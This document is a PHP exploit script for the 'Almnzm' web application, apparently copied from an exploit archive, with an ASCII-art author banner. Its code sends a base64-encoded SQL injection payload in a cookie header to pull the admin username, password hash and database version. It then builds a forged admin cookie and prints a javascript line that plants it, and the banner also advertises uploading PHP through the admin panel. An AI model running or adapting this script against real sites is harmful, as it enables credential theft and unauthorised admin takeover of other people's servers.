almnzm-sql.txt

Posted on 29 June 2009
<?
print_r('
||          ||   | ||
o_,_7 _||  . _o_7 _|| q_|_||  o_///_,
(  :  /    (_)    /           (      .

___________________
_/QQQQQQQQQQQQQQQQQQQ\__
---Script Almnzm SQL INJECTION     __/QQQ/````````````````QQQ\___
_/QQQQQ/                  QQQQQQ\n---"Powered by Almnzm"          /QQQQ/``                    ```QQQQ\n/QQQQ/                          QQQQ\n---admin cookie create        |QQQQ/    By  Qabandi             QQQQ|
---Add PhP Ext                |QQQQ|                            |QQQQ|
---Upload php in adminCP      |QQQQ|    From Kuwait, PEACE...   |QQQQ|
|QQQQ|                            |QQQQ|
|QQQQ       iqa[a]hotmail.fr     /QQQQ|
QQQQ                      __  /QQQQ/
QQQQ                    /QQ\_QQQQ/
QQQQ                   QQQQQQQ/
QQQQQ                 /QQQQQ/_
``QQQQQ\_____________/QQQ/QQQQ\_
``QQQQQQQQQQQQQQQQQQQ/  `QQQQ\n');

if ($argc<3) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' localhost /mnzm/
-----------------------------------------------------------------------------
');
die;
}
$host = $argv[1];
$p = "http://".$host.$argv[2];

function QAB_GET($qabandi, $from){
$content = $from;
preg_match_all("/<".$qabandi.">([^<]+)</".$qabandi.">/",
$content,
$out, PREG_PATTERN_ORDER);

return $out[1][0];
}



$packet ="GET ".$p."index.php?action=creatticket&step=2 HTTP/1.0
";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
";
$packet.="Pragma: no-cache
";
$packet.="Cookie: customer=LTInIFVuSW9OIFNlTGVDdCAxLGNvbmNhdChDSEFSKDYwLDExOCwxMDEsMTE0LDExNSwxMDUsMTExLDExMCw2MiksVmVSc0lvTigpLENIQVIoNjAsNDcsMTE4LDEwMSwxMTQsMTE1LDEwNSwxMTEsMTEwLDYyKSksY29uY2F0KENIQVIoNjAsMTA5LDk3LDEwNSwxMDgsNjIpLGVtYWlsLENIQVIoNjAsNDcsMTA5LDk3LDEwNSwxMDgsNjIpKSw0LDUsNixjb25jYXQoQ0hBUig2MCwxMTIsOTcsMTE1LDExNSw2MikscGFTU1dvcmQsQ0hBUig2MCw0NywxMTIsOTcsMTE1LDExNSw2MikpLDgsY29uY2F0KENIQVIoNjAsMTE3LDExNSwxMDEsMTE0LDYyKSxuQU1FLENIQVIoNjAsNDcsMTE3LDExNSwxMDEsMTE0LDYyKSksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMgZlJPbSBNT0RlckFUb3JzICAvKjpxYWJhbmRpOnFhYmFuZGk=".";
";
$packet.="Connection: Close

";
$o = @fsockopen($host, 80);
if(!$o){
echo "
[x] No response...
";
die;
}

fputs($o, $packet);
while (!feof($o)) $data .= fread($o, 1024);
fclose($o);

$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
if ( !empty($_404) ){
echo "
[x] 404 Not Found... Make sure of path. 
";
die;
}

echo "

---Qabandi Is Here-------------------------------------------

";

$Q_ver = QAB_GET("version", $data);
$Q_usr = QAB_GET("user", $data);
$Q_pwd = QAB_GET("pass", $data);


echo "[q]version:
".$Q_ver."

";
echo "[q]Admin User:
".$Q_usr."

";
echo "[q]Admin Hash:
".$Q_pwd."

";

$qookie = base64_encode(":".$Q_usr.":".$Q_pwd);

echo "
---Admin Cookie:
";
echo "

javascript:document.cookie='user=".$qookie."';

";
echo "

---Qabandi Was Here------------------------------------------

";
die;
?>
TOP
Malware :

None in database
Last 20
Exploits :

Last 20